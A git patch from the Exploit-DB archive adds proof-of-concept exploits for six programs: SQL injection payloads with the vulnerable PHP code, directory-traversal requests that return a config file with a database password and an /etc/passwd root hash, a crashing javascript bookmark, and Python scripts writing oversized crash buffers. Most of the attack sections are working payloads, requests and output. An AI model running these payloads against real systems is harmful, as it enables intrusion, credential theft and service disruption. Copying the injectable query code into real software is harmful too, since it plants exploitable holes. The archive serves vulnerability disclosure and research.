From 4d43b968d872fc6171885dbf3f97fec7b0b52cf4 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 24 Aug 2018 05:01:53 +0000
Subject: [PATCH] DB: 2018-08-24

7 changes to exploits/shellcodes

CuteFTP 8.3.1 - Denial of Service (PoC)
Epiphany Web Browser 3.28.1 - Denial of Service (PoC)

StyleWriter 4 1.0 - Denial of Service (PoC)

CMS ISWEB 3.5.3 - Directory Traversal
Twitter-Clone 1 - 'code' SQL Injection
PCViewer vt1000 - Directory Traversal
---
 exploits/linux/dos/45249.txt         | 84 ++++++++++++++++++++++++++++
 exploits/php/webapps/45155.txt       | 26 +++++++++
 exploits/php/webapps/45247.txt       | 64 +++++++++++++++++++++
 exploits/windows/local/45171.vb      |  2 +-
 exploits/windows/webapps/45248.txt   | 33 +++++++++++
 exploits/windows_x86-64/dos/45246.py | 28 ++++++++++
 exploits/windows_x86/local/45250.py  | 27 +++++++++
 files_exploits.csv                   |  6 ++
 8 files changed, 269 insertions(+), 1 deletion(-)
 create mode 100644 exploits/linux/dos/45249.txt
 create mode 100644 exploits/php/webapps/45155.txt
 create mode 100644 exploits/php/webapps/45247.txt
 create mode 100644 exploits/windows/webapps/45248.txt
 create mode 100755 exploits/windows_x86-64/dos/45246.py
 create mode 100755 exploits/windows_x86/local/45250.py

diff --git a/exploits/linux/dos/45249.txt b/exploits/linux/dos/45249.txt
new file mode 100644
index 000000000..08501cffd
--- /dev/null
+++ b/exploits/linux/dos/45249.txt
@@ -0,0 +1,84 @@
+# Exploit Title: Epiphany Web Browser 3.28.1 - Denial of Service (PoC)
+# Author: Dhiraj Mishra
+# Date: 2018-08-23
+# Software: https://projects-old.gnome.org/epiphany/
+# Version: 3.28.1
+# CVE: N/A
+# Tested on: Ubuntu 18 64bit
+
+# Steps to reproduce:
+1. Open epiphany browser
+2. Bookmark any random page
+3. Then navigate to bookmark properties set:
+    Name = Crash
+    Address = javascript:window.open('javascript:document.write("<script></script>");');
+4. Browser any URL's and try to open the above bookmark
+5. The browser crashes
+
+# Below backtrace for your reference.
+
+$ gdb epiphany
+GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
+Copyright (C) 2018 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
+and "show warranty" for details.
+This GDB was configured as "x86_64-linux-gnu".
+Type "show configuration" for configuration details.
+For bug reporting instructions, please see:
+<http://www.gnu.org/software/gdb/bugs/>.
+Find the GDB manual and other documentation resources online at:
+<http://www.gnu.org/software/gdb/documentation/>.
+For help, type "help".
+Type "apropos word" to search for commands related to "word"...
+Reading symbols from epiphany...(no debugging symbols found)...done.
+(gdb) r
+Starting program: /usr/bin/epiphany 
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+[New Thread 0x7fffe08b6700 (LWP 9295)]
+[New Thread 0x7fffdee4b700 (LWP 9296)]
+[New Thread 0x7fffde64a700 (LWP 9297)]
+[New Thread 0x7fffdcdcf700 (LWP 9298)]
+[New Thread 0x7fff8fffd700 (LWP 9299)]
+[New Thread 0x7fff8f7fc700 (LWP 9300)]
+[New Thread 0x7fff8effb700 (LWP 9301)]
+[New Thread 0x7fff8e38b700 (LWP 9302)]
+[New Thread 0x7fff8db8a700 (LWP 9303)]
+[New Thread 0x7fff8d389700 (LWP 9305)]
+[New Thread 0x7fff77b0a700 (LWP 9310)]
+[New Thread 0x7fff7598c700 (LWP 9320)]
+[New Thread 0x7fff7518b700 (LWP 9321)]
+[New Thread 0x7fff7498a700 (LWP 9327)]
+[New Thread 0x7fff7698c700 (LWP 9334)]
+[New Thread 0x7fff5ffff700 (LWP 9335)]
+[New Thread 0x7fff5f7fe700 (LWP 9336)]
+[New Thread 0x7fff5effd700 (LWP 9337)]
+[New Thread 0x7fff5e7fc700 (LWP 9338)]
+[New Thread 0x7fff5dffb700 (LWP 9339)]
+[Thread 0x7fff8db8a700 (LWP 9303) exited]
+[Thread 0x7fff8e38b700 (LWP 9302) exited]
+[Thread 0x7fff5e7fc700 (LWP 9338) exited]
+[Thread 0x7fff7698c700 (LWP 9334) exited]
+[Thread 0x7fff5f7fe700 (LWP 9336) exited]
+[Thread 0x7fff5effd700 (LWP 9337) exited]
+[Thread 0x7fff5dffb700 (LWP 9339) exited]
+[Thread 0x7fff5ffff700 (LWP 9335) exited]
+Error scanning plugin /usr/lib/mozilla/plugins/libpepflashplayer.so, /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0/WebKitPluginProcess returned 256 exit status
+[New Thread 0x7fff5ffff700 (LWP 9399)]
+[Thread 0x7fff7498a700 (LWP 9327) exited]
+[New Thread 0x7fff7498a700 (LWP 9402)]
+[Thread 0x7fff7498a700 (LWP 9402) exited]
+
+Thread 22 "pool" received signal SIGSEGV, Segmentation fault.
+[Switching to Thread 0x7fff5ffff700 (LWP 9399)]
+0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
+(gdb) bt
+#0  0x00007ffff7b75db7 in  () at /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
+#1  0x00007ffff7079be6 in  () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
+#2  0x00007ffff73fe7d0 in  () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
+#3  0x00007ffff73fde05 in  () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
+#4  0x00007fffefc206db in start_thread (arg=0x7fff5ffff700) at pthread_create.c:463
+#5  0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
+(gdb)
\ No newline at end of file
diff --git a/exploits/php/webapps/45155.txt b/exploits/php/webapps/45155.txt
new file mode 100644
index 000000000..4ad725383
--- /dev/null
+++ b/exploits/php/webapps/45155.txt
@@ -0,0 +1,26 @@
+# Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal
+# Date: 2018-08-01
+# Exploit Author: Thiago "thxsena" Sena
+# Vendor Homepage: http://www.isweb.it
+# Version: 3.5.3
+# Tested on: Linux
+# CVE : N/A
+
+# PoC:
+# CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file download,
+# as demonstrated by
+
+moduli/downloadFile.php?file=oggetto_documenti/../.././inc/config.php
+
+# Download and open it.
+$dati_db = array(
+    'tipo' => 'mysql',
+    'host' => 'localhost',
+    'user' => 'networkis',
+    'password' => 'guybrush77',
+    'database' => 'networkis',
+    'database_offline' => '',
+    'persistenza' => FALSE,
+    'prefisso' => '',
+    'like' => 'LIKE'
+);
\ No newline at end of file
diff --git a/exploits/php/webapps/45247.txt b/exploits/php/webapps/45247.txt
new file mode 100644
index 000000000..e07c41df3
--- /dev/null
+++ b/exploits/php/webapps/45247.txt
@@ -0,0 +1,64 @@
+# Exploit Title: Twitter-Clone 1 - 'code' SQL Injection
+# Date: 2018-08-22
+# Exploit Author: L0RD
+# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
+# Version: 1
+# CVE: N/A
+# Tested on: Win 10
+# vulnerable files : [mailactivation.php , stalkers.php , search.php]
+# vulnerable parameters : [name , code , id]
+
+# 1) search.php :
+# vulnerable parameter : name
+# Type : Error-based
+# Payload : 
+
+%' AND extractvalue(1,concat(0x3a,database(),0x3a))%23
+
+# vulnerable code :
+if($_GET['name']!=""){
+$what = $_GET['name'];
+include "connect.php";
+$users = mysqli_query($con, "SELECT id, username, followers, following,
+tweets
+  FROM users
+ WHERE username LIKE '%$what%'
+ ORDER BY username ASC
+ LIMIT 0, 10
+");
+
+# 2) mailactivation.php :
+# vulnerable parameter : code
+# Type : Union query
+# Payload : 
+
+' UNION SELECT 1,user(),3,4,5,6%23
+
+# vulnerable code :
+include "connect.php";
+$givenname = $_GET['username'];
+$givencode = $_GET['code'];
+$query = mysqli_query($con, "SELECT code, active
+  FROM users
+  WHERE code = '$givencode' AND username = '$givenname'
+ ");
+$row = mysqli_fetch_assoc($query);
+$wantedcode = $row['code'];
+
+# 3) stalkers.php :
+# vulnerable parameter : id
+# Type : Union query
+# Payload : 
+
+' UNION SELECT 1,2,user(),4,5,6
+
+# vulnerable code :
+if ($_GET['id'] != "") {
+$theid = $_GET['id'];
+include "connect.php";
+$stalked = mysqli_query($con, "SELECT id, username, followers, following
+ FROM users
+  WHERE id = '$theid'
+");
+$row1 = mysqli_fetch_assoc($stalked);
+$usern = $row1['username'];
\ No newline at end of file
diff --git a/exploits/windows/local/45171.vb b/exploits/windows/local/45171.vb
index 57c4e988d..117589bcc 100644
--- a/exploits/windows/local/45171.vb
+++ b/exploits/windows/local/45171.vb
@@ -2,7 +2,7 @@
 # Date: 2018-08-08 
 # Exploit Author: VortexNeoX64
 # Vendor Homepage: https://soroush-app.ir
-# Software Link: https://soroush-app.ir/UploadedData/Soroush.exe
+# Software Link: http://54.36.43.176/SoroushSetup0.17.0.exe
 # Version: 0.17.0 BETA
 # Tested on: Windows 10 1803 and windows server 2016 14393
  
diff --git a/exploits/windows/webapps/45248.txt b/exploits/windows/webapps/45248.txt
new file mode 100644
index 000000000..65357a50a
--- /dev/null
+++ b/exploits/windows/webapps/45248.txt
@@ -0,0 +1,33 @@
+# Exploit Title: PCViewer vt1000 - Directory Traversal
+# Exploit Author: Berk Dusunur
+# Google Dork: N/A
+# Type: Hardware
+# Date: 2018-07-21
+# Vendor Homepage: N/A
+# Software Link: http://www.softpedia.com/get/System/File-Management/Pc-Viewer.shtml
+# Affected Version: vt1000
+# Tested on: Parrot OS
+# CVE : N/A
+
+# Proof Of Concept
+
+GET Request
+
+GET ../../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: target:8080/
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
+Gecko/20100101 Firefox/61.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+Response
+
+HTTP/1.1 200 OK
+Server:Cross Web Server
+Content-length: 59
+Content-type: application/octet-stream
+
+root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45246.py b/exploits/windows_x86-64/dos/45246.py
new file mode 100755
index 000000000..12e773718
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45246.py
@@ -0,0 +1,28 @@
+# Exploit Title : CuteFTP 8.3.1 - Denial Of Service (PoC)
+# Exploit Author : Ali Alipour
+# WebSite : Alipour.it
+# Date: 2018-08-22
+# Vendor Homepage : http://www.cuteftp.com/
+# Software Link Download : https://filehippo.com/download_cuteftp_pro/4518/
+# Tested on : Windows 10 - 64-bit
+
+# Steps to Reproduce
+# Run the python exploit script, it will create a new 
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the CuteFTP program. 
+# In the new window click "File" > "Connect" > "Connect To URL" . 
+# Now Paste the content of "exploit.txt" into the field: " Connect To URL ". 
+# Click "OK" and you will see a crash.
+
+#!/usr/bin/python
+    
+buffer = "A" * 7000
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45250.py b/exploits/windows_x86/local/45250.py
new file mode 100755
index 000000000..0da1e3e87
--- /dev/null
+++ b/exploits/windows_x86/local/45250.py
@@ -0,0 +1,27 @@
+# Exploit Title: StyleWriter 4 1.0 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-23
+# Homepage: http://www.editorsoftware.com
+# Software Link: http://www.editorsoftware.com/StyleWriter_Download.php
+# Tested Version: 1.0
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. In the new window click "Tools" >"Add Pattern...". 
+# Now in the new window paste the content of 
+# "exploit.txt" into the following fields:"Pattern to Find" & "Advice Message". 
+# Click "Add" and you will see a crash.
+
+#!/usr/bin/python
+   
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0c28339c3..484e23d18 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6064,6 +6064,8 @@ id,file,description,date,author,type,platform,port
 45239,exploits/windows_x86-64/dos/45239.py,"UltraISO 9.7.1.3519 - Denial Of Service (PoC)",2018-08-22,"Ali Alipour",dos,windows_x86-64,
 45241,exploits/windows_x86/dos/45241.py,"Easyboot 6.6.0 - Denial Of Service (PoC)",2018-08-22,"Gionathan Reale",dos,windows_x86,
 45245,exploits/windows_x86/dos/45245.py,"Softdisk 3.0.3 - Denial Of Service (PoC)",2018-08-22,"Gionathan Reale",dos,windows_x86,
+45246,exploits/windows_x86-64/dos/45246.py,"CuteFTP 8.3.1 - Denial of Service (PoC)",2018-08-23,"Ali Alipour",dos,windows_x86-64,
+45249,exploits/linux/dos/45249.txt,"Epiphany Web Browser 3.28.1 - Denial of Service (PoC)",2018-08-23,"Dhiraj Mishra",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9896,6 +9898,7 @@ id,file,description,date,author,type,platform,port
 45235,exploits/windows_x86/local/45235.py,"Project64 2.3.2 - Buffer Overflow (SEH)",2018-08-22,"Shubham Singh",local,windows_x86,
 45243,exploits/linux/local/45243.txt,"Ghostscript - Multiple Vulnerabilities",2018-08-22,"Google Security Research",local,linux,
 45244,exploits/windows/local/45244.txt,"Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation",2018-08-22,"Atredis Partners",local,windows,
+45250,exploits/windows_x86/local/45250.py,"StyleWriter 4 1.0 - Denial of Service (PoC)",2018-08-23,"Gionathan Reale",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39817,6 +39820,7 @@ id,file,description,date,author,type,platform,port
 45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx,
 45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
 45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
+45155,exploits/php/webapps/45155.txt,"CMS ISWEB 3.5.3 - Directory Traversal",2018-08-06,"Thiago Sena",webapps,php,
 45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80
 45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
 45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
@@ -39846,3 +39850,5 @@ id,file,description,date,author,type,platform,port
 45236,exploits/hardware/webapps/45236.txt,"ZyXEL VMG3312-B10B - Cross-Site Scripting",2018-08-22,"Samet ŞAHİN",webapps,hardware,
 45237,exploits/php/webapps/45237.php,"KingMedia 4.1 - Remote Code Execution",2018-08-22,"Efrén Díaz",webapps,php,
 45242,exploits/hardware/webapps/45242.txt,"Geutebrueck re_porter 16 - Cross-Site Scripting",2018-08-22,"Kamil Suska",webapps,hardware,
+45247,exploits/php/webapps/45247.txt,"Twitter-Clone 1 - 'code' SQL Injection",2018-08-23,L0RD,webapps,php,
+45248,exploits/windows/webapps/45248.txt,"PCViewer vt1000 - Directory Traversal",2018-08-23,"Berk Dusunur",webapps,windows,